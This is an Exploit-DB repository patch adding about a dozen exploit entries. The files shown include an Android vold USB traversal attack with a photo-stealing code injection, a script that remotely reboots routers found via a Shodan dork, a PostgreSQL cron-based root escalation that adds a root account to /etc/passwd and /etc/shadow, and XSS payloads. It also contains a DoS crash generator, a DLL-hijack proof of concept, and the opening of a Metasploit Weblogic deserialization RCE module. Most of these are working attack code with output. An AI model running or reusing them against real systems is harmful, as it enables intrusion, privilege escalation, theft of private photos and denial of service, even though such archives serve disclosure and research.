From 1e34c2b6a5ef9f5c0a39dbbd30277808ce43c40b Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 14 Aug 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-08-14

11 changes to exploits/shellcodes

IP Finder 1.5 - Denial of Service (PoC)
Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)
PLC Wireless Router GPN2.4P21-C-CN - Denial of Service
Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)
Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow
PostgreSQL 9.4-0.5.3 - Privilege Escalation
Android - Directory Traversal over USB via Injection in blkid Output

Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution

Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)

Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)

IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting

Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)
---
 exploits/android/local/45192.txt    | 347 ++++++++++++++++++++++++++++
 exploits/hardware/dos/45187.py      |  26 +++
 exploits/linux/local/45184.sh       |  55 +++++
 exploits/multiple/webapps/45190.txt |  27 +++
 exploits/windows/dos/45186.py       |  23 ++
 exploits/windows/remote/45180.txt   | 120 ++++++++++
 exploits/windows/remote/45193.rb    | 313 +++++++++++++++++++++++++
 exploits/windows_x86/dos/45182.py   |  25 ++
 exploits/windows_x86/dos/45191.py   |  23 ++
 exploits/windows_x86/local/45181.py |  54 +++++
 files_exploits.csv                  |  12 +-
 files_shellcodes.csv                |   1 +
 shellcodes/linux_x86-64/45185.asm   |  93 ++++++++
 13 files changed, 1118 insertions(+), 1 deletion(-)
 create mode 100644 exploits/android/local/45192.txt
 create mode 100755 exploits/hardware/dos/45187.py
 create mode 100755 exploits/linux/local/45184.sh
 create mode 100644 exploits/multiple/webapps/45190.txt
 create mode 100755 exploits/windows/dos/45186.py
 create mode 100644 exploits/windows/remote/45180.txt
 create mode 100755 exploits/windows/remote/45193.rb
 create mode 100755 exploits/windows_x86/dos/45182.py
 create mode 100755 exploits/windows_x86/dos/45191.py
 create mode 100755 exploits/windows_x86/local/45181.py
 create mode 100644 shellcodes/linux_x86-64/45185.asm

diff --git a/exploits/android/local/45192.txt b/exploits/android/local/45192.txt
new file mode 100644
index 000000000..5870332b8
--- /dev/null
+++ b/exploits/android/local/45192.txt
@@ -0,0 +1,347 @@
+When a USB mass storage device is inserted into an Android phone (even if the
+phone is locked!), vold will attempt to automatically mount partitions from the
+inserted device. For this purpose, vold has to identify the partitions on the
+connected device and collect some information about them, which is done in
+readMetadata() in system/vold/Utils.cpp. This function calls out to "blkid",
+then attempts to parse the results:
+
+
+    std::vector<std::string> cmd;
+    cmd.push_back(kBlkidPath);
+    cmd.push_back("-c");
+    cmd.push_back("/dev/null");
+    cmd.push_back("-s");
+    cmd.push_back("TYPE");
+    cmd.push_back("-s");
+    cmd.push_back("UUID");
+    cmd.push_back("-s");
+    cmd.push_back("LABEL");
+    cmd.push_back(path);
+
+    std::vector<std::string> output;
+    status_t res = ForkExecvp(cmd, output, untrusted ? sBlkidUntrustedContext : sBlkidContext);
+    if (res != OK) {
+        LOG(WARNING) << "blkid failed to identify " << path;
+        return res;
+    }
+
+    char value[128];
+    for (const auto& line : output) {
+        // Extract values from blkid output, if defined
+        const char* cline = line.c_str();
+        const char* start = strstr(cline, "TYPE=");
+        if (start != nullptr && sscanf(start + 5, "\"%127[^\"]\"", value) == 1) {
+            fsType = value;
+        }
+
+        start = strstr(cline, "UUID=");
+        if (start != nullptr && sscanf(start + 5, "\"%127[^\"]\"", value) == 1) {
+            fsUuid = value;
+        }
+
+        start = strstr(cline, "LABEL=");
+        if (start != nullptr && sscanf(start + 6, "\"%127[^\"]\"", value) == 1) {
+            fsLabel = value;
+        }
+    }
+
+
+Normally, the UUID string can't contain any special characters because blkid
+generates it by reformatting a binary ID as a printable UUID string. However,
+the version of blkid that Android is using will print the LABEL first, without
+escaping the characters this code scans for, allowing an attacker to place
+special characters in the fsUuid variable.
+
+
+For example, if you format a USB stick with a single partition, then place a
+romfs filesystem in the partition as follows (on the terminal of a Linux PC):
+
+    # echo '-rom1fs-########TYPE="vfat" UUID="../../data"' > /dev/sdc1
+
+and then connect the USB stick to a Nexus 5X and run blkid as root on the
+device, you'll see the injection:
+
+    bullhead:/ # blkid -c /dev/null -s TYPE -s UUID -s LABEL /dev/block/sda1
+    /dev/block/sda1: LABEL="TYPE="vfat" UUID="../../data"" TYPE="romfs"
+
+
+logcat shows that the injection was successful and the device is indeed using
+the injected values, but vold doesn't end up doing much with the fake UUID
+because fsck_msdos fails:
+
+05-29 20:41:26.262   391   398 V vold    : /dev/block/vold/public:8,1: LABEL="TYPE="vfat" UUID="../../data"" TYPE="romfs" 
+05-29 20:41:26.262   391   398 V vold    : 
+05-29 20:41:26.263   391   398 V vold    : /system/bin/fsck_msdos
+05-29 20:41:26.263   391   398 V vold    :     -p
+05-29 20:41:26.263   391   398 V vold    :     -f
+05-29 20:41:26.263   391   398 V vold    :     /dev/block/vold/public:8,1
+05-29 20:41:26.264   813  2039 D VoldConnector: RCV <- {652 public:8,1 vfat}
+05-29 20:41:26.264   813  2039 D VoldConnector: RCV <- {653 public:8,1 ../../data}
+05-29 20:41:26.265   813  2039 D VoldConnector: RCV <- {654 public:8,1 TYPE=}
+05-29 20:41:26.281   391   398 I fsck_msdos: ** /dev/block/vold/public:8,1
+05-29 20:41:26.285   391   398 I fsck_msdos: Invalid sector size: 8995
+05-29 20:41:26.286   391   398 I fsck_msdos: fsck_msdos terminated by exit(8)
+05-29 20:41:26.286   391   398 E Vold    : Filesystem check failed (no filesystem)
+05-29 20:41:26.286   391   398 E vold    : public:8,1 failed filesystem check
+05-29 20:41:26.286   813  2039 D VoldConnector: RCV <- {651 public:8,1 6}
+05-29 20:41:26.287   813  2039 D VoldConnector: RCV <- {400 48 Command failed}
+05-29 20:41:26.288  2532  2532 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,1}:
+05-29 20:41:26.288  2532  2532 D StorageNotification:     type=PUBLIC diskId=disk:8,0 partGuid=null mountFlags=0 mountUserId=0 
+05-29 20:41:26.288  2532  2532 D StorageNotification:     state=UNMOUNTABLE 
+05-29 20:41:26.288  2532  2532 D StorageNotification:     fsType=vfat fsUuid=../../data fsLabel=TYPE= 
+05-29 20:41:26.288  2532  2532 D StorageNotification:     path=null internalPath=null 
+
+
+For a relatively harmless example in which vold actually ends up mounting the
+device in the wrong place, you can create a vfat partition with label
+'UUID="../##':
+
+    # mkfs.vfat -n 'PLACEHOLDER' /dev/sdc1
+    mkfs.fat 4.1 (2017-01-24)
+    # dd if=/dev/sdc1 bs=1M count=200 | sed 's|PLACEHOLDER|UUID="../##|g' | dd of=/dev/sdc1 bs=1M
+    200+0 records in
+    200+0 records out
+    209715200 bytes (210 MB, 200 MiB) copied, 1.28705 s, 163 MB/s
+    198+279 records in
+    198+279 records out
+    209715200 bytes (210 MB, 200 MiB) copied, 2.60181 s, 80.6 MB/s
+
+Connect it to the Android device again while running strace against vold:
+
+    [pid   398] newfstatat(AT_FDCWD, "/mnt/media_rw/../##", 0x7d935fe708, AT_SYMLINK_NOFOLLOW) = -1 ENOENT (No such file or directory)
+    [pid   398] mkdirat(AT_FDCWD, "/mnt/media_rw/../##", 0700) = 0
+    [pid   398] fchmodat(AT_FDCWD, "/mnt/media_rw/../##", 0700) = 0
+    [pid   398] fchownat(AT_FDCWD, "/mnt/media_rw/../##", 0, 0, 0) = 0
+    [pid   398] mount("/dev/block/vold/public:8,1", "/mnt/media_rw/../##", "vfat", MS_NOSUID|MS_NODEV|MS_NOEXEC|MS_DIRSYNC|MS_NOATIME, "utf8,uid=1023,gid=1023,fmask=7,d"...) = 0
+    [pid   398] faccessat(AT_FDCWD, "/mnt/media_rw/../##/LOST.DIR", F_OK) = -1 ENOENT (No such file or directory)
+    [pid   398] mkdirat(AT_FDCWD, "/mnt/media_rw/../##/LOST.DIR", 0755) = 0
+
+Check the results:
+
+    bullhead:/ # ls -l /mnt
+    total 32
+    drwxrwx--- 3 media_rw media_rw 32768 2018-05-29 20:54 ##
+    drwx--x--x 2 root     root        40 1970-01-01 04:14 appfuse
+    drwxr-xr-x 2 root     system      40 1970-01-01 04:14 asec
+    drwxrwx--x 2 system   system      40 1970-01-01 04:14 expand
+    drwxr-x--- 2 root     media_rw    40 1970-01-01 04:14 media_rw
+    drwxr-xr-x 2 root     system      40 1970-01-01 04:14 obb
+    drwx------ 5 root     root       100 1970-01-01 04:14 runtime
+    lrwxrwxrwx 1 root     root        21 1970-01-01 04:14 sdcard -> /storage/self/primary
+    drwx------ 3 root     root        60 1970-01-01 04:14 secure
+    drwxr-xr-x 3 root     root        60 1970-01-01 04:14 user
+    bullhead:/ # mount | grep '##'
+    /dev/block/vold/public:8,1 on /mnt/## type vfat (rw,dirsync,nosuid,nodev,noexec,noatime,uid=1023,gid=1023,fmask=0007,dmask=0007,allow_utime=0020,codepage=437,iocharset=iso8859-1,shortname=mixed,utf8,errors=remount-ro)
+
+
+When testing with a normal USB stick, the attacker has to choose between using a
+vfat filesystem (so that Android is capable of mounting it as external storage)
+and using a romfs filesystem (so that the label is long enough to specify
+arbitrary paths). However, an attacker who wants to perform more harmful attacks
+could use a malicious USB storage device that is capable of delivering different
+data for multiple reads from the same location. This way, it would be possible
+to deliver a romfs superblock when blkfs is reading, but deliver a vfat
+superblock when the kernel is reading. I haven't tested this yet because I don't
+yet have the necessary hardware.
+
+
+When you fix this issue, please don't just fix the injection and/or the
+directory traversal. I believe that from a security perspective, a smartphone
+should not mount storage devices that are inserted while the screen is locked
+(or, more generally, communication with new USB devices should be limited while
+the screen is locked). Mounting a USB storage device exposes a lot of code to
+the connected device, including partition table parsing, vold logic, blkid, the
+kernel's FAT filesystem implementation, and anything on the device that might
+decide to read files from the connected storage device.
+
+
+############################################################
+
+This is a PoC for stealing photos from the DCIM folder of a Pixel 2 running
+build OPM2.171026.006.C1 while the device is locked. You will need a Pixel 2 as
+victim device, a corresponding AOSP build tree, a Raspberry Pi Zero W (or some
+other device you can use for device mode USB), a powered USB hub, and some
+cables.
+
+The victim phone must be powered on, the disk encryption keys must be unlocked
+(meaning that you must have entered your PIN/passphrase at least once since
+boot), and the attack probably won't work if someone has recently (since the
+last reboot) inserted a USB stick into the phone.
+
+
+Configure the Raspberry Pi Zero W such that it is usable for gadget mode
+(see e.g. https://gist.github.com/gbaman/50b6cca61dd1c3f88f41).
+
+Apply the following patch to frameworks/base in your AOSP build tree:
+
+=========================================
+diff --git a/packages/ExternalStorageProvider./src/com/android/externalstorage/MountReceiver.java b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java
+index 8a6c7d68525..73be5818da1 100644
+--- a/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java
++++ b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java
+@@ -20,10 +20,38 @@ import android.content.BroadcastReceiver;
+ import android.content.ContentProviderClient;
+ import android.content.Context;
+ import android.content.Intent;
++import java.io.File;
++import java.io.FileInputStream;
++import java.io.FileOutputStream;
+ 
+ public class MountReceiver extends BroadcastReceiver {
+     @Override
+     public void onReceive(Context context, Intent intent) {
++        System.logE("MOUNTRECEIVER CODE INJECTED, GRABBING FILES...");
++        try {
++            File exfiltration_dir = new File("/data/exfiltrated-photos");
++            exfiltration_dir.mkdir();
++            File camera_dir = new File("/storage/emulated/0/DCIM/Camera");
++            File[] camera_files = camera_dir.listFiles();
++            for (File camera_file: camera_files) {
++                System.logE("GRABBING '"+camera_file.getName()+"'");
++                File exfiltrated_file = new File(exfiltration_dir, camera_file.getName());
++                exfiltrated_file.delete();
++                FileInputStream ins = new FileInputStream(camera_file);
++                FileOutputStream outs = new FileOutputStream(exfiltrated_file);
++                byte[] buf = new byte[4096];
++                int len;
++                while ((len=ins.read(buf)) > 0) {
++                    outs.write(buf, 0, len);
++                }
++                ins.close();
++                outs.close();
++            }
++        } catch (Exception e) {
++            throw new RuntimeException(e);
++        }
++        System.logE("INJECTED CODE DONE");
++
+         final ContentProviderClient client = context.getContentResolver()
+                 .acquireContentProviderClient(ExternalStorageProvider.AUTHORITY);
+         try {
+=========================================
+
+Then build the tree ("lunch aosp_walleye-userdebug", then build with "make").
+
+Zip the classes.dex build artifact of ExternalStorageProvider:
+
+$ zip -jX zipped_dexfile ~/aosp-walleye/out/target/common/obj/APPS/ExternalStorageProvider_intermediates/classes.dex
+  adding: classes.dex (deflated 49%)
+$ mv zipped_dexfile.zip zipped_dexfile
+
+Download the factory image for OPM2.171026.006.C1 and unpack its system partition, e.g. using commands roughly as follows:
+
+$ unzip image-walleye-opm2.171026.006.c1.zip
+$ ~/aosp-walleye/out/host/linux-x86/bin/simg2img system.img system.img.raw # convert sparse image to normal
+$ echo 'rdump / walleye-opm2.171026.006.c1/unpacked_system/' | debugfs -f- walleye-opm2.171026.006.c1/unpacked_image/system.img.raw 2>/dev/null # extract filesystem image
+
+Now build the classes.dex build artifact into an odex file and a vdex file, linking against boot.art from the factory image:
+
+$ ~/aosp-walleye/out/host/linux-x86/bin/dex2oat --runtime-arg -Xms64m --runtime-arg -Xmx512m --class-loader-context='&' --boot-image=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/framework/boot.art --dex-file=zipped_dexfile --dex-location=/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk --oat-file=package.odex --android-root=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system --instruction-set=arm64 --instruction-set-variant=cortex-a73 --instruction-set-features=default --runtime-arg -Xnorelocate --compile-pic --no-generate-debug-info --generate-build-id --abort-on-hard-verifier-error --force-determinism --no-inline-from=core-oj.jar --compiler-filter=quicken
+
+The resulting vdex file would not be accepted by the phone because of a CRC32
+checksum mismatch; to fix it up, compile the attached vdex_crc32_fixup.c and use
+it to overwrite the CRC32 checksum with the expected one from the factory image:
+
+$ ./vdex_crc32_fixup package.vdex ~/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk 
+original crc32: d0473780
+new crc32: 84c10ae9
+vdex patched
+
+Prepare two disk images, each with a MBR partition table and a single partition.
+Their partition tables should be identical.
+In the first image's partition, place a fake romfs filesystem that triggers the
+vold bug:
+
+# echo -e '-rom1fs-########TYPE="vfat" UUID="../../data"\0' > /dev/sdd1
+
+Format the second image's partition with FAT32, and create the following
+directory structure inside that filesystem (the "system@" entries are files, the
+rest are directories):
+
+├── dalvik-cache
+│   └── arm64
+│       ├── system@framework@boot.art
+│       ├── system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex
+│       └── system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex
+├── LOST.DIR
+├── misc
+│   └── profiles
+│       └── cur
+│           └── 0
+│               └── com.android.externalstorage
+├── user
+│   └── 0
+│       └── com.android.externalstorage
+│           └── cache
+└── user_de
+    └── 0
+        └── com.android.externalstorage
+            └── code_cache
+
+The three system@ files should have the following contents:
+
+ - system@framework@boot.art should be a copy of system/framework/arm64/boot.art
+   from the system image.
+ - system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex
+   should be the generated package.odex.
+ - system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex
+   should be the fixed-up package.vdex.
+
+Copy the two disk images to the Raspberry Pi Zero W; the fake romfs image should
+be named "disk_image_blkid", the image with FAT32 should be named
+"disk_image_mount". On the Pi, build the fuse_intercept helper:
+
+$ gcc -Wall fuse_intercept.c `pkg-config fuse --cflags --libs` -o fuse_intercept
+
+Then create a directory "mount" and launch fuse_intercept.
+
+In a second terminal, tell the Pi's kernel to present the contents of the mount
+point as a mass storage device:
+
+pi@raspberrypi:~ $ sudo modprobe dwc2
+pi@raspberrypi:~ $ sudo modprobe g_mass_storage file=/home/pi/mount/wrapped_image stall=0
+
+
+To run the attack, connect the Pi to the powered USB hub as a device. Then use
+a USB-C OTG adapter (unless you have some fancy USB-C hub, I guess?) to connect
+the powered hub to the locked phone, with the phone in USB host mode.
+
+At this point, the phone should first mount the USB stick over
+/data, then immediately afterwards launch
+com.android.externalstorage/.MountReceiver:
+
+06-05 21:58:20.988   656   665 I Vold    : Filesystem check completed OK
+06-05 21:58:20.988  1115  1235 D VoldConnector: RCV <- {656 public:8,97 /mnt/media_rw/../../data}
+06-05 21:58:20.990  1115  1235 D VoldConnector: RCV <- {655 public:8,97 /mnt/media_rw/../../data}
+06-05 21:58:21.004  1115  1235 D VoldConnector: RCV <- {651 public:8,97 2}
+06-05 21:58:21.004  1115  1115 W android.fg: type=1400 audit(0.0:33): avc: denied { write } for name="/" dev="sdg1" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0
+06-05 21:58:21.006  1115  1235 D VoldConnector: RCV <- {200 7 Command succeeded}
+06-05 21:58:21.004  1115  1115 W android.fg: type=1400 audit(0.0:34): avc: denied { write } for name="/" dev="sdg1" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0
+06-05 21:58:21.008  1335  1335 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,97}:
+06-05 21:58:21.008  1335  1335 D StorageNotification:     type=PUBLIC diskId=disk:8,96 partGuid=null mountFlags=0 mountUserId=0 
+06-05 21:58:21.008  1335  1335 D StorageNotification:     state=MOUNTED 
+06-05 21:58:21.008  1335  1335 D StorageNotification:     fsType=vfat fsUuid=../../data fsLabel=TYPE= 
+06-05 21:58:21.008  1335  1335 D StorageNotification:     path=/mnt/media_rw/../../data internalPath=/mnt/media_rw/../../data 
+06-05 21:58:21.020  1115  1129 I ActivityManager: Start proc 4478:com.android.externalstorage/u0a35 for broadcast com.android.externalstorage/.MountReceiver
+
+Most processes can't access the vfat filesystem that is now mounted at /data
+either because they lack the necessary groups or because of some SELinux rule.
+But com.android.externalstorage passes both checks and can read and write (but
+not execute) files from the new /data. Bytecode is loaded from
+/data/dalvik-cache/arm64/system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex
+and then interpreted, allowing the attacker to steal photos from the device
+(since com.android.externalstorage has access to /storage/emulated/0):
+
+06-05 21:58:21.248  4478  4478 I zygote64: The ClassLoaderContext is a special shared library.
+06-05 21:58:21.276  4478  4478 W zygote64: JIT profile information will not be recorded: profile file does not exits.
+06-05 21:58:21.278  4478  4478 W asset   : failed to open idmap file /data/resource-cache/vendor@overlay@Pixel@PixelThemeOverlay.apk@idmap
+06-05 21:58:21.326  4478  4478 D ExternalStorage: After updating volumes, found 3 active roots
+06-05 21:58:21.334  4478  4478 E System  : MOUNTRECEIVER CODE INJECTED, GRABBING FILES...
+06-05 21:58:21.343  4478  4478 E System  : GRABBING 'IMG_20180605_212044.jpg'
+06-05 21:58:21.419  4478  4478 E System  : GRABBING 'IMG_20180605_215031.jpg'
+06-05 21:58:21.428  2218  2218 W SQLiteLog: (28) file renamed while open: /data/user/0/com.google.android.gms/databases/config.db
+06-05 21:58:21.465  4478  4478 E System  : INJECTED CODE DONE
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45192.zip
\ No newline at end of file
diff --git a/exploits/hardware/dos/45187.py b/exploits/hardware/dos/45187.py
new file mode 100755
index 000000000..316e417aa
--- /dev/null
+++ b/exploits/hardware/dos/45187.py
@@ -0,0 +1,26 @@
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Unauthenticated Remote Reboot
+# Date: 8/12/2018
+# Exploit Author: Chris Rose
+# Affected Model : GPN2.4P21-C-CN(Firmware: W2001EN-00)
+# Vendor: ChinaMobile
+# Tested on: Debian Linux
+# Shodan dork- title:PLC 
+# CVE: None
+#Description: PLC Wireless Router's are vulnerable to a unauthenticated remote reboot
+# which can be achieved through sending a modified http request. The script below will
+# take a user suppled IP address of a PLC router and send the exploit to the device.# Use the Shodan dork above to find PLC wireless routers.
+
+import requests
+import time
+
+
+
+target = raw_input("Enter target IP: ")
+post_data = {'reboot' : 'Reboot', 'obj-action' : 'reboot', 'var%3Anoredirect' : '1', 'var%3Amenu' : 'maintenance', 'var%3Apage' : 'system', 'var%3Aerrorpage' : 'system', 'getpage' : 'html%2Fpage%2Frestarting.html'}
+exploit = requests.post("http://"+target+":8080/cgi-bin/webproc", data=post_data)
+
+print ("Sent exploit attempt to %s")% target
+time.sleep(1.2)
+print ("Test if device is offline.")
+time.sleep(1.5)
+print ("Visit http://"+target+":8080/")
\ No newline at end of file
diff --git a/exploits/linux/local/45184.sh b/exploits/linux/local/45184.sh
new file mode 100755
index 000000000..95b39664f
--- /dev/null
+++ b/exploits/linux/local/45184.sh
@@ -0,0 +1,55 @@
+# Exploit Title: PostgreSQL 9.4-0.5.3 - Privilege Escalation
+# Date: 2017-10-11
+# Exploit Author: Johannes Segitz
+# Vendor Homepage: https://bugzilla.suse.com/show_bug.cgi?id=1062722
+# Software Link: -
+# Version: Before postgresql-init-9.4-0.5.3.1
+# Tested on: SUSE Linux Enterprise 11 SP4
+# CVE : CVE-2017-14798
+
+#!/bin/sh
+
+# don't use spaces or other funny characters in here
+CRON_DIR='/etc/cron.hourly'
+CRON_FILE="$CRON_DIR/totally_not_a_lpe"
+
+declare -a CLEANUP_ELEMENTS=('base' 'global' 'pg_clog' 'pg_hba.conf' 'pg_ident.conf' 'pg_multixact' 'pg_subtrans' 'pg_tblspc' 'pg_twophase' 'PG_VERSION' 'pg_xlog' 'postgresql.conf')
+
+if [ "$(whoami)" != "postgres" ]; then
+  echo "Must be run as user postgres"
+  exit -1
+fi
+cd
+
+echo setting up exploit
+mv data data2
+ln -s $CRON_DIR data
+
+echo waiting for DB restart
+while [ ! -w $CRON_DIR ]; do
+  sleep 1 
+done
+
+echo able to write $CRON_DIR
+echo '#!/bin/sh' > $CRON_FILE
+echo 'echo '"'"'pg_root:x:0:0:,,,:/home/pg_root:/bin/bash'"'"' >> /etc/passwd' >> $CRON_FILE
+echo 'echo '"'"'pg_root:$2y$05$6F6hHGfvZ42Mq1EF8V.e8uguGumaZsZ4P9qfjiuHFT/k8B2CZrJaO:16339:0:99999:7:::'"'"' >> /etc/shadow' >> $CRON_FILE
+echo "rm $CRON_FILE" >> $CRON_FILE
+echo "chown root.root ${CRON_DIR}" >> $CRON_FILE
+chmod +x $CRON_FILE
+
+if [ -e $CRON_FILE ]; then
+  echo wrote $CRON_FILE
+else
+  echo failed to write $CRON_FILE, exiting
+  exit 1
+fi
+
+echo cleaning up
+for i in "${CLEANUP_ELEMENTS[@]}"; do
+   rm -rf "$CRON_DIR/$i"
+done
+rm data
+mv data2 data 
+
+echo now wait, depending on CRON_DIR setting you should be able to log into this system with pg_root:foobar soonish. Enjoy!
\ No newline at end of file
diff --git a/exploits/multiple/webapps/45190.txt b/exploits/multiple/webapps/45190.txt
new file mode 100644
index 000000000..fcf54ced6
--- /dev/null
+++ b/exploits/multiple/webapps/45190.txt
@@ -0,0 +1,27 @@
+# Exploit Title: [IBM Sterling B2B Integrator persistent cross-site scripting]
+# Exploit Author: [Vikas Khanna] (https://www.linkedin.com/in/leetvikaskhanna/) (https://twitter.com/MR_SHANU_KHANNA)
+# Vendor Homepage: [https://www.ibm.com/support/knowledgecenter/en/SS3JSW_5.2.0/com.ibm.help.overview.doc/si_overview.html]
+# Version: [IBM Sterling B2B Integrator 5.2.0.1 - 5.2.6.3] (REQUIRED)
+# CVE : [CVE-2018-1513 & CVE-2018-1563]
+
+
+Vulnerability Details
+Vulnerability Name : Persistent Cross Site Scripting 
+Affected Parameter(s) : fname & lname
+
+Steps to reproduce
+Step 1 : Login to the IBM Sterling B2B Integrator.
+
+Step 2 : Navigate to Performance Tuning module, Username will be displayed as below :- 
+				Last Edited By <USERNAME>
+	Note :- Modify the configuration for example and check the Last Edited By - Username. Any user (Admin or Non admin) who have privileges to change the configuration can act like an attacker. 
+
+Step 3 : Navigate to My Account and update first name and last name.
+
+Step 4: Intercept the request using burp suite and insert the <Video><source onerror=”alert(1)”> payload & <Video><source onerror=”alert(2)”> payload in fname and lname parameter.
+
+Step 5 : It has been observed that My account module is not vulnerable to XSS but Performance Tuning tab under Operations -> Performance is vulnerable, as the Performance Tuning tab displays the user’s first name and last name separately as “Last Edited By USERNAME”.
+
+Step 6 : Now navigate to Performance Tuning module. It is seen that the application is vulnerable to Persistent Cross Site Scripting.
+
+Note : It has been observed that any user who has access to Performance Tuning tab will be vulnerable and the same javascript payload will execute for them as well.
\ No newline at end of file
diff --git a/exploits/windows/dos/45186.py b/exploits/windows/dos/45186.py
new file mode 100755
index 000000000..b9efd4602
--- /dev/null
+++ b/exploits/windows/dos/45186.py
@@ -0,0 +1,23 @@
+# Exploit Title : Acunetix Web Vulnerability Scanner 10.0 Build 20150623 - Denial of Service (PoC)
+# Discovery by: Javier Enrique Rodriguez Gutierrez
+# Discovery Date    : 2018-08-11
+# Vendor Homepage: https://www.acunetix.com
+# Tested Version    : 10.0
+# Vulnerability Type    : Denial of Service (PoC)
+# Tested on OS  : Windows 10 PRO x86 en
+  
+
+# 1 . run python code : python generate.py
+# 2 . open generate.txt and copy content to clipboard
+# 3 . open "Acunetix Web Vulnerability Scanner 10.0"
+# 4 . from Tools Explorer --> subdomain scanner
+# 5 . Paste ClipBoard on "Domain"
+# 6 . Click start
+# 7 . Crashed
+ 
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+buffer = "\x41" * 2769
+f = open ("generate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/45180.txt b/exploits/windows/remote/45180.txt
new file mode 100644
index 000000000..01bb826d5
--- /dev/null
+++ b/exploits/windows/remote/45180.txt
@@ -0,0 +1,120 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DIRECTX-SDK-XACT.EXE-TROJAN-FILE-CODE-EXECUTION.txt
+[+] ISR: Apparition Security   
+       
+ 
+***Greetz: indoushka | Eduardo***  
+
+
+Vendor
+=============
+www.microsoft.com
+
+
+Product
+===========
+Microsoft DirectX SDK (June 2010) Xact3.exe
+https://www.microsoft.com/en-us/download/details.aspx?id=6812
+
+XACT (Cross-platform audio creation tool) is an audio creation and authoring tool from Microsoft.
+It comes with a graphical interface that allows sound designers to create audio resources for games,
+that can be integrated into XNA projects, offering the game developer a convenient way of accessing these sounds.
+
+
+Vulnerability Type
+===================
+Remote Code Execution
+
+
+
+CVE Reference
+==============
+N/A
+
+
+
+Security Issue
+================
+Microsoft DirectX SDK "Xact3.exe" Cross-platform tool allows for arbitrary code execution via a Trojan horse file "xbdm.dll"
+in the current working directory, upon opening a ".xap" project file from same location. 
+The DirectX SDK deprecated but still avail for download at time of this writing ...
+
+
+
+Exploit/POC
+=============
+1) create DLL 32bit DLL named "xbdm.dll" and place on a remote share
+
+2) create an empty file with a ".xap" extension on the same share, this will open using "Xact3.exe" as its default
+
+3) open the the .xap file from the Network share then BOOM!
+
+
+#include <windows.h>
+
+/* hyp3rlinx */
+
+/*
+gcc -c -m32 xbdm.c
+gcc -shared -m32 -o xbdm.dll xbdm.o
+*/
+
+void executo(){
+	 MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin " , MB_YESNO + MB_ICONQUESTION );
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
+	switch(fdwReason){
+		case DLL_PROCESS_ATTACH:{
+			 executo();
+			break;
+		}
+		case DLL_PROCESS_DETACH:{
+			 executo();
+			break;
+		}
+		case DLL_THREAD_ATTACH:{
+			 executo();
+			break;
+		}
+		case DLL_THREAD_DETACH:{
+			 executo();
+			break;
+		}
+	}
+	
+	return TRUE;
+}
+
+
+
+
+Network Access
+===============
+Remote
+
+
+
+Severity
+=========
+High
+
+
+
+Disclosure Timeline
+=============================
+Vendor Notification: June 7, 2018
+MSRC Case 45973 : June 13, 2018
+MSRC : "While your finding is valid, we won’t service this issue because the legacy DirectX SDK is deprecated." : August 10, 2018
+August 11, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/exploits/windows/remote/45193.rb b/exploits/windows/remote/45193.rb
new file mode 100755
index 000000000..d603d7605
--- /dev/null
+++ b/exploits/windows/remote/45193.rb
@@ -0,0 +1,313 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Oracle Weblogic Server Deserialization RCE',
+      'Description' => %q{
+        An unauthenticated attacker with network access to the Oracle Weblogic
+        Server T3 interface can send a serialized object to the interface to
+        execute code on vulnerable hosts.
+      },
